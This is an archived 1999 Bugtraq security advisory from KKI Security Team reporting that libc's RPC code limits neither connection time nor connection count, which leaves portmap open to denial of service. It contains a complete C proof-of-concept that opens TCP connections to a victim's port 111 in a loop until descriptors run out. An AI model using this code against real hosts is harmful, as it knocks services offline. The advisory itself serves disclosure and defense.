X-Sender: lluzar@nova.kki.krakow.pl MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Wed, 14 Apr 1999 15:26:14 +0200 Reply-To: Lukasz Luzar Sender: Bugtraq List From: Lukasz Luzar Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc To: BUGTRAQ@netspace.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet, Poland http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Raport title : Lack of RPC's implementation in libc libraries and how it affects for example portmap. Problem found by : Lukasz Luzar (lluzar@security.kki.pl) Raport created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Problem found at : 08 April 1999 Raport published : 14 April 1999 Raport code : KKIS.08041999.001.b Short description : full description below Vulnerable versions : libc*, up to current. Platforms affected : Linux X.X, FreeBSD X.X, probably others... Patches : curently not available Archive : http://www.security.kki.pl/advisories/ Impact description : full description below Risk level : medium Notes : we were unable to contact with authors of libc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It seems that libc's RPC implementation does not check neither time of established connections, nor number of connected sockets. It is quite dangerous, because many network services is based on this functions. ~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Below there is ther program which shows how to make DoS of portmap (tcp) When max. limit of descriptors per process is not set, it could easly lead to haevy problems with victim's machine stability. (e.g. default sets on FreeBSD) When limit of open descriptors is reached, portmap begins to refuse all new connections. ~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- CUT HERE --- /* * example.c by Lukasz Luzar (lluzar@security.kki.pl) */ #include #include #include #include #include #include #define ADDR "10.0.0.1" // victim's IP address in dot notation #define PORT 111 // victim service to DoS eg. portmapper void main() { int sockfd, n = 0; struct sockaddr_in victim_addr; bzero((char *) &victim_addr, sizeof( victim_addr)); victim_addr.sin_family = AF_INET; victim_addr.sin_addr.s_addr=inet_addr( ADDR); victim_addr.sin_port = htons( PORT); fprintf( stdout, "Opening new connections...\n"); for(;;) { if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) { fprintf( stderr, "socket error at %d\n",n); break; } if( connect( sockfd,(struct sockaddr*) &victim_addr, sizeof( victim_addr)) < 0) { fprintf( stderr,"connect error at %d\n",n); break; } n++; } fprintf( stdout, "Established %d connections " "and waiting...\n", n); for(;;); } --- CUT HERE --- ~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~